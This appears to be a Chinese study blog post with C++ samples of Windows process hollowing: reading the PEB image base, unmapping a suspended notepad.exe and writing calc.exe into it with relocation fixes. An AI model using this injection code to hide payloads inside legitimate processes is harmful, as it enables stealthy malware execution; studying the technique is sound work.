#include <iostream>

#include <Windows.h>

#include <winternl.h>

#include <tchar.h>

#pragma comment(lib, "ntdll")

int main()

{

    // create destination process - this is the process to be hollowed out

    LPSTARTUPINFOA si = new STARTUPINFOA();

    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();

    ULONG returnLenght = 0;

    CreateProcessA(NULL, (LPSTR)"c:\\windows\\system32\\calc.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);

    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB

    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);

    ULONG_PTR  pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 8; //如果是在x64,则改成16

    // get destination imageBaseAddress

    LPVOID destImageBase = 0;

    SIZE_T bytesRead = NULL;

    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(ULONG_PTR), &bytesRead); 
    std::cout << "pebImageBaseOffset is: " << destImageBase << std::endl; std::cin.get(); 
}

因为PebBaseAddress在x86下是指向PEB+8,在x64下是指向PEB+16

具体的结构体:

typedef struct _PEB {

    BYTE Reserved1[2]; //2个字节

    BYTE BeingDebugged; //1个字节

    BYTE Reserved2[1]; //1个字节

    PVOID Reserved3[2];

    PPEB_LDR_DATA Ldr;

    PRTL_USER_PROCESS_PARAMETERS ProcessParameters;

    PVOID Reserved4[3];

    PVOID AtlThunkSListPtr;

    PVOID Reserved5;

    ULONG Reserved6;

    PVOID Reserved7;

    ULONG Reserved8;

    ULONG AtlThunkSListPtr32;

    PVOID Reserved9[45];

    BYTE Reserved10[96];

    PPS_POST_PROCESS_INIT_ROUTINE PostProcessInitRoutine;

    BYTE Reserved11[128];

    PVOID Reserved12[1];

    ULONG SessionId;

} PEB, *PPEB;

如果在x86下,则是以4字节对齐,那么偏移8才能指向Reserved3[1]

在x64下,则是以8字节对齐,那么只有偏移16才能指向Reserved3[1]

可以看这个链接:https://blog.csdn.net/v2x222/article/details/71082150 (ImageBaseAddress : Ptr32 Void  and +0x010 ImageBaseAddress : Ptr64 Void)

第二个sample:

#include <iostream>

#include <Windows.h>

#include <winternl.h>

#pragma comment(lib, "ntdll")

using NtUnmapViewOfSection = NTSTATUS(WINAPI*)(HANDLE, PVOID);

typedef struct BASE_RELOCATION_BLOCK {

    DWORD PageAddress;

    DWORD BlockSize;

} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;

typedef struct BASE_RELOCATION_ENTRY {

    USHORT Offset : 12;

    USHORT Type : 4;

} BASE_RELOCATION_ENTRY, * PBASE_RELOCATION_ENTRY;

int main()

{

    // create destination process - this is the process to be hollowed out

    LPSTARTUPINFOA si = new STARTUPINFOA();

    LPPROCESS_INFORMATION pi = new PROCESS_INFORMATION();

    PROCESS_BASIC_INFORMATION* pbi = new PROCESS_BASIC_INFORMATION();

    ULONG returnLenght = 0;

    CreateProcessA(NULL, (LPSTR)"c:\\windows\\syswow64\\notepad.exe", NULL, NULL, TRUE, CREATE_SUSPENDED, NULL, NULL, si, pi);

    HANDLE destProcess = pi->hProcess;

    // get destination imageBase offset address from the PEB

    NtQueryInformationProcess(destProcess, ProcessBasicInformation, pbi, sizeof(PROCESS_BASIC_INFORMATION), &returnLenght);

    ULONG_PTR pebImageBaseOffset = (ULONG_PTR)pbi->PebBaseAddress + 16;

    // get destination imageBaseAddress

    LPVOID destImageBase = 0;

    SIZE_T bytesRead = NULL;

    ReadProcessMemory(destProcess, (LPCVOID)pebImageBaseOffset, &destImageBase, sizeof(ULONG_PTR), &bytesRead);

    // read source file - this is the file that will be executed inside the hollowed process

    HANDLE sourceFile = CreateFileA("c:\\windows\\system32\\calc.exe", GENERIC_READ, NULL, NULL, OPEN_ALWAYS, NULL, NULL);

    ULONG_PTR sourceFileSize = GetFileSize(sourceFile, NULL);

    SIZE_T fileBytesRead = 0;

    LPVOID sourceFileBytesBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sourceFileSize);

    ReadFile(sourceFile, sourceFileBytesBuffer, sourceFileSize, NULL, NULL);

    // get source image size

    PIMAGE_DOS_HEADER sourceImageDosHeaders = (PIMAGE_DOS_HEADER)sourceFileBytesBuffer;

    PIMAGE_NT_HEADERS sourceImageNTHeaders = (PIMAGE_NT_HEADERS)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew);

    SIZE_T sourceImageSize = sourceImageNTHeaders->OptionalHeader.SizeOfImage;

    // carve out the destination image

    NtUnmapViewOfSection myNtUnmapViewOfSection = (NtUnmapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtUnmapViewOfSection"));

    myNtUnmapViewOfSection(destProcess, destImageBase);

    // allocate new memory in destination image for the source image

    LPVOID newDestImageBase = VirtualAllocEx(destProcess, destImageBase, sourceImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    destImageBase = newDestImageBase;

    // get delta between sourceImageBaseAddress and destinationImageBaseAddress

    ULONG_PTR deltaImageBase = (ULONG_PTR)destImageBase - sourceImageNTHeaders->OptionalHeader.ImageBase;

    // set sourceImageBase to destImageBase and copy the source Image headers to the destination image

    sourceImageNTHeaders->OptionalHeader.ImageBase = (ULONG_PTR)destImageBase;

    WriteProcessMemory(destProcess, newDestImageBase, sourceFileBytesBuffer, sourceImageNTHeaders->OptionalHeader.SizeOfHeaders, NULL);

    // get pointer to first source image section

    PIMAGE_SECTION_HEADER sourceImageSection = (PIMAGE_SECTION_HEADER)((ULONG_PTR)sourceFileBytesBuffer + sourceImageDosHeaders->e_lfanew + sizeof(_IMAGE_NT_HEADERS64)); //IMAGE_NT_HEADERS32

    PIMAGE_SECTION_HEADER sourceImageSectionOld = sourceImageSection;

    // copy source image sections to destination

    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)

    {

        PVOID destinationSectionLocation = (PVOID)((ULONG_PTR)destImageBase + sourceImageSection->VirtualAddress);

        PVOID sourceSectionLocation = (PVOID)((ULONG_PTR)sourceFileBytesBuffer + sourceImageSection->PointerToRawData);

        WriteProcessMemory(destProcess, destinationSectionLocation, sourceSectionLocation, sourceImageSection->SizeOfRawData, NULL);

        sourceImageSection++;

    }

    // get address of the relocation table

    IMAGE_DATA_DIRECTORY relocationTable = sourceImageNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];

    // patch the binary with relocations

    sourceImageSection = sourceImageSectionOld;

    for (int i = 0; i < sourceImageNTHeaders->FileHeader.NumberOfSections; i++)

    {

        BYTE* relocSectionName = (BYTE*)".reloc";

        if (memcmp(sourceImageSection->Name, relocSectionName, 5) != 0)

        {

            sourceImageSection++;

            continue;

        }

        ULONG_PTR sourceRelocationTableRaw = sourceImageSection->PointerToRawData;

        ULONG_PTR relocationOffset = 0;

        while (relocationOffset < relocationTable.Size) {

            PBASE_RELOCATION_BLOCK relocationBlock = (PBASE_RELOCATION_BLOCK)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            relocationOffset += sizeof(BASE_RELOCATION_BLOCK);

            ULONG_PTR relocationEntryCount = (relocationBlock->BlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY);

            PBASE_RELOCATION_ENTRY relocationEntries = (PBASE_RELOCATION_ENTRY)((ULONG_PTR)sourceFileBytesBuffer + sourceRelocationTableRaw + relocationOffset);

            for (ULONG_PTR y = 0; y < relocationEntryCount; y++)

            {

                relocationOffset += sizeof(BASE_RELOCATION_ENTRY);

                if (relocationEntries[y].Type == 0)

                {

                    continue;

                }

                ULONG_PTR patchAddress = relocationBlock->PageAddress + relocationEntries[y].Offset;

                ULONG_PTR patchedBuffer = 0;

                ReadProcessMemory(destProcess, (LPCVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &bytesRead);

                patchedBuffer += deltaImageBase;

                WriteProcessMemory(destProcess, (PVOID)((ULONG_PTR)destImageBase + patchAddress), &patchedBuffer, sizeof(ULONG_PTR), &fileBytesRead);

            }

        }

    }

    return 0;

}

win32-ReadProcessMemory在x86和x64下运行的更多相关文章

  1. VS2012在win7 64位机中x86和x64下基本类型的占用空间大小(转)

    VS2012在win7 64位机中x86和x64下基本类型的占用空间大小 #include "stdafx.h" #include <windows.h> int _t ...

  2. x86和x64下指针的大小

    根据测试 int main() { ; )); )); int n1 = sizeof(a); int n2 = sizeof(p); // int n3 = sizeof(*p); error in ...

  3. C语言整数类型在X86和X64下的字节大小

    C声明 32位机器(X86) 64位机器(X64) char 1 1 short int 2 2 int 4 4 long int 4 8 long long int 8 8 char * 4 8 f ...

  4. [百度空间] [原]跨平台编程注意事项(二): windows下 x86到x64的移植

    之前转的: 将程序移植到64位Windows 还有自己乱写的一篇: 跨平台编程注意事项(一) 之前对于x64平台的移植都是纸上谈兵,算是前期准备工作, 但起码在写代码时,已经非常注意了.所以现在移植起 ...

  5. X86和X64环境下的基本类型所占用的字节大小

    同样的程序代码,使用Visual Studio 进行编译,当目标平台分别为x86或x64环境时,其编译结果是不同的.在x86环境下,指针都是4个字节的:而在x64环境下,指针都是8字节的.测试代码如下 ...

  6. Windows下x86和x64平台的Inline Hook介绍

    前言 我在之前研究文明6的联网机制并试图用Hook技术来拦截socket函数的时候,熟悉了简单的Inline Hook方法,但是由于之前的方法存在缺陷,所以进行了深入的研究,总结出了一些有关Windo ...

  7. (转载)用VS2012或VS2013在win7下编写的程序在XP下运行就出现“不是有效的win32应用程序“

    原文地址:http://www.vcerror.com/?p=1483 问题描述: 用VC2013编译了一个程序,在Windows 8.Windows 7(64位.32位)下都能正常运行.但在Win ...

  8. win32和x86以及x64的区别

    本来是知道x86和x64的区别的. 今天突然在VS2008上看到一个win32的选项,一下子懵了,这是什么玩意. 百度之,发现答案 win32是指windows 32位的操作系统,顾名思义是支持32为 ...

  9. 如何让VS2012编写的程序在XP下运行

    Win32主程序需要以下设置 第一步:在工程属性General设置 第二步:在C/C++ Code Generation 设置 第三步:SubSystem 和  Minimum Required Ve ...

  10. Visual Studio中Debug与Release以及x86、x64、Any CPU的区别 &&&& VS中Debug与Release、_WIN32与_WIN64的区别

    本以为这些无关紧要的 Debug与Release以及x86.x64.Any CPU 差点搞死人了. 看了以下博文才后怕,难怪我切换了一下模式,程序就pass了.... 转载: 1.https://ww ...

随机推荐

  1. [转帖]优化命令之iotop命令

    文章目录 引言 一.iotop简介 1.iotop安装 2.iotop语法 3.iotop参数 二.I/O的常用快捷键 三.交互模式 四.iotop示例 1.只显示正在产生I/O的进程 2.显示指定P ...

  2. [转帖]【测试】 FIO:ceph/磁盘IO测试工具 fio(iodepth深度)

    目录 随看随用 NAS文件系统测试 块系统测试 FIO用法 FIO介绍 FIO 工具常用参数: FIO结果说明 I/O 的重放('录'下实际工况的IO,用fio'重放') fio工作参数可以写入配置文 ...

  3. [转帖]Redis子进程开销与优化

    Redis子进程开销与优化 文章系转载,便于分类和归纳,源文地址:https://blog.csdn.net/y532798113/article/details/106870299 1.CPU 开销 ...

  4. iperf的学习与部分网络状况的简要总结

    背景 随着信息安全的越来越重要,公司要求进行数据备份. 部分客户现场交付之前需要进行性能压测,但是因为各种环境问题效果不是很理想. 前段时间疫情严重,经常需要居家办公,出现了很多网络相关的问题. 因为 ...

  5. 记windows自定义bat脚本自启动

    自定义 Windows 启动脚本简化版 在本指南中,我们将使用一个简化的批处理文件(.bat)来演示如何创建自定义的 Windows 启动脚本.以下是一个基本的模板,您只需根据需要在 :begin 部 ...

  6. 在WPF应用中实现DataGrid的分组显示,以及嵌套明细展示效果

    我在前面随笔<在Winform系统开发中,对表格列表中的内容进行分组展示>,介绍了Winform程序中对表格内容进行了分组的展示,在WPF应用中,同样也可以对表格的内容进行分组展示,不过处 ...

  7. 重磅文章:VictoriaMetrics存储引擎分析.pdf

    作者:张富春(ahfuzhang),转载时请注明作者和引用链接,谢谢! cnblogs博客 zhihu Github 公众号:一本正经的瞎扯 万字长文,详细介绍 VictoriaMetrics 存储引 ...

  8. net core部署iis执行此操作时出错web.config

    页面访问会报服务器内部错误,你点对应的IIS下的默认页面或模块会出现下面的错语. 请到官网下载对应的运行时:https://www.microsoft.com/net/download 如果是服务器, ...

  9. 用户 'NT Service\SSISScaleOutMaster140' 登录失败

    用户 'NT Service\SSISScaleOutMaster140' 登录失败. 原因: 找不到与提供的名称匹配的登录名. 项目情况: 用户 'NT Service\SSISScaleOutMa ...

  10. 私密离线聊天新体验!llama-gpt聊天机器人:极速、安全、搭载Llama 2

    "私密离线聊天新体验!llama-gpt聊天机器人:极速.安全.搭载Llama 2,尽享Code Llama支持!" 一个自托管的.离线的.类似chatgpt的聊天机器人.由美洲驼 ...